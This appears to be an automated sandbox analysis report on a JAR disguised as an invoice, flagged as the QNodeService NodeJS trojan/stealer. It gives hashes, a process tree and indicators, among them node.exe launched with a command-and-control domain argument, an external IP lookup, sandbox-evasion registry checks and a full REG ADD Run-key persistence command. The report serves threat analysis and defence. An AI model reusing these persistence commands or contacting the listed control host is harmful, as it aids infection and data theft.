Analysis
-
max time kernel
48s -
max time network
131s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
09-11-2020 07:55
Static task
static1
Behavioral task
behavioral1
Sample
ORGINV687400321566.jar
Resource
win7v20201028
Behavioral task
behavioral2
Sample
ORGINV687400321566.jar
Resource
win10v20201028
General
-
Target
ORGINV687400321566.jar
-
Size
94KB
-
MD5
85cc374e0d0f090b1fed3b48e837fd76
-
SHA1
8b69b98a03683d9cf235d32968ae69b1b7bfffd9
-
SHA256
1af7622fc4457af9970c6127789894db5ba5d39667dbf99b51939cba5414ee3b
-
SHA512
4ff78e3c8e4ccecb0c9498bf314aa78c606139b4da378913fcaa2834cef97bd54cf941b070a2c71e82d75e6ed5cc766aafe12bebbe8210a3ff00948aec750e94
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 1800 node.exe 3052 node.exe 3968 node.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\0d0cd538-8d32-4c2d-9ef5-cd884aa5658d = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001ab64-173.dat js behavioral2/files/0x000100000001ab64-181.dat js behavioral2/files/0x000100000001ab64-185.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 26 wtfismyip.com 27 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 1800 node.exe 1800 node.exe 1800 node.exe 1800 node.exe 3052 node.exe 3052 node.exe 3052 node.exe 3052 node.exe 3968 node.exe 3968 node.exe 3968 node.exe 3968 node.exe 3968 node.exe 3968 node.exe 3968 node.exe 3968 node.exe 3968 node.exe 3968 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 984 wrote to memory of 1840 984 java.exe 76 PID 984 wrote to memory of 1840 984 java.exe 76 PID 1840 wrote to memory of 1800 1840 javaw.exe 80 PID 1840 wrote to memory of 1800 1840 javaw.exe 80 PID 1800 wrote to memory of 3052 1800 node.exe 82 PID 1800 wrote to memory of 3052 1800 node.exe 82 PID 3052 wrote to memory of 3968 3052 node.exe 83 PID 3052 wrote to memory of 3968 3052 node.exe 83 PID 3968 wrote to memory of 2708 3968 node.exe 85 PID 3968 wrote to memory of 2708 3968 node.exe 85 PID 2708 wrote to memory of 676 2708 cmd.exe 86 PID 2708 wrote to memory of 676 2708 cmd.exe 86
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\ORGINV687400321566.jar1⤵
- Suspicious use of WriteProcessMemory
PID:984 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\ef71d7a4.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain osiman.zapto.org3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_2L4k6R\boot.js --hub-domain osiman.zapto.org4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3052 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_2L4k6R\boot.js --hub-domain osiman.zapto.org5⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3968 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "0d0cd538-8d32-4c2d-9ef5-cd884aa5658d" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "0d0cd538-8d32-4c2d-9ef5-cd884aa5658d" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:676
-
-
-
-
-
-